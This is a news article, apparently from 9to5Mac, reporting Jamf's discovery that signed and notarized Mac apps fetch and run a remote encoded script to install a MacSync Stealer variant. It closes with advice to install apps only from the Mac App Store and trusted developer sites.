We recently saw how ChatGPT is being used to trick Mac users into installing MacStealer, and now we’ve discovered another tactic to convince users to install a version of MacSync Stealer.
Thanks to Apple’s protections against installing malware, Macs remain a relatively difficult target for attackers. But Mac malware is on the rise, and two tactics recently discovered by security researchers highlight the ingenious approaches some attackers are using.
There were once two main reasons why Mac malware was relatively rare compared to Windows machines. The first, of course, was the relatively low market share of the Mac. The second is the protections Apple has built in to detect and block rogue apps.
As the Mac’s market share grows, so too does the platform’s attractiveness as a target, especially given that Apple’s demographics make Mac users a particularly attractive target for financial fraud.
When you try to install a new Mac app, macOS verifies that the app is notarized by Apple as signed by a known developer. If not, this fact is flagged and macOS makes it a relatively complicated process to bypass the protection and install it.
Earlier this month, we discovered that attackers were using ChatGPT and other AI chatbots to trick Mac users into pasting command lines into Terminal and installing Macware. Cybersecurity company Jamf has discovered an example of a different approach being taken.
MacSync Stealer installer
Jamf says the malware is a variant of the “increasingly active” MacSync Stealer malware.
Attackers use Swift apps that are signed, notarized, and do not themselves contain malware. However, the app retrieves an encoded script from a remote server that is executed and installs the malware.
We inspected the Mach-O binaries that are universal builds and found that they are both code signed and notarized. The signature is associated with developer team ID GNJLS3UYZ4.
We also verified the code directory hashes against Apple’s revocation list, and none were revoked at the time of our analysis (…)
Most payloads associated with MacSync Stealer tend to execute primarily in memory, leaving little or no trace on disk.
The company says that attackers are increasingly using this type of approach.
This change in distribution reflects a broader trend across the macOS malware landscape, with attackers increasingly attempting to sneak malware into signed and notarized executable files that appear as legitimate applications. By leveraging these techniques, attackers reduce their chances of early detection.
Jamf says it has reported the developer ID to Apple and the company is currently revoking the certificate.
9to5Mac’s opinion
As always, the best protection against Mac malware is to install apps only from the Mac App Store and trusted developer websites.
Featured accessories
Photo by Ramshid on Unsplash
